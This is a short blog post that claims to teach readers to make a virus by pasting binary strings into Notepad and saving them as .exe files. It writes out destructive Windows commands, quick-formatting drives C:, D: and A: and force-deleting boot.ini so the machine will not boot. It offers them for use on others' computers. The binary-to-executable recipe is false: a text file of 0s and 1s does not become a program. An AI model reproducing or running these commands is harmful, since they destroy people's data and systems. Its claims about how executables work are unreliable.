Tuesday, June 4

A simple virus that formats system drive .


A simple binary codes that can format the system drive ,secondary drives…

Copy The Following In Notepad Exactly as it

01001011000111110010010101010101010000011111100000

Save As EXE File.( means save it as any name  with file extension .exe , example : joy.exe ).

Other Simple Codes For Creating Virus That formats Other Drives Are As Follows :

 This Code will format your drive c:\

format c:\ /Q/X
01100110011011110111001001101101011000010111010000 100000011000110011101001011100

0010000000101111010100010010111101011000

 This Code will format your drive d:\

format d:\ /Q/X
01100110011011110111001001101101011000010111010000 100000011001000011101001011100

0010000000101111010100010010111101011000

 this will format your drive a:\

format a:\ /Q/X
01100110011011110111001001101101011000010111010000 100000011000010011101001011100

0010000000101111010100010010111101011000

 This will cause your computer not to boot.

del /F/S/Q c:\boot.ini
01100100011001010110110000100000001011110100011000 101111010100110010111101010001

00100000011000110011101001011100011000100110111101 101111011101000010111001101001

0110111001101001

Note : Save all this files with a file extension .exe 

No comments:

Post a Comment